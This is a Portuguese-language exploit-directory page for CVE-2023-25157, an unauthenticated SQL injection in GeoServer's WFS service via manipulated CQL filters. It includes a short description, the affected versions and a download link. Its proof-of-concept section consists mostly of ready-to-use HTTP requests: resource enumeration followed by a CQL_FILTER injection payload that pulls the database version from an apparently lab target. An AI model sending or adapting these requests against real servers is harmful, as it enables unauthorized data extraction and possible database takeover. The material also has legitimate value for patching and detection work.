Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-25157 — Exploit para CVE-2023-25157: injeção de SQL no serviço WFS do GeoServer por meio de sintaxe de filtro CQL manipulada, permitindo extração remota de dados sem autenticação e possível comprometimento do servidor de banco de dados. | Kitploit
Ferramentas/GitHubGitHub/charis3306/cve-2023-25157
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubcharis3306/cve-2023-25157

CVE-2023-25157

Exploit para CVE-2023-25157: injeção de SQL no serviço WFS do GeoServer por meio de sintaxe de filtro CQL manipulada, permitindo extração remota de dados sem autenticação e possível comprometimento do servidor de banco de dados.

Ver Repositório
31há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Descrição da Vulnerabilidade

Devido à falta de filtragem das entradas do usuário, um atacante remoto não autenticado pode construir uma sintaxe de filtro malformada, contornar a análise léxica do GeoServer, causando injeção de SQL, obtendo informações sensíveis do servidor e, possivelmente, até mesmo privilégios no servidor de banco de dados.

Versões Afetadas

GeoServer 2.20.x < 2.20.7

GeoServer 2.19.x < 2.19.7

GeoServer 2.18.x < 2.18.7

GeoServer 2.21.x < 2.21.4

GeoServer 2.22.x < 2.22.2

POC

Obtendo nomes de recursos disponíveis

Pesquisa

root@kitploit:~
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

Obtendo propriedades disponíveis dos recursos relevantes

Obtenha as propriedades relacionadas ao nome do recurso

vulhub:example
root@kitploit:~
/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

root@kitploit:~
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true

Baixar ferramenta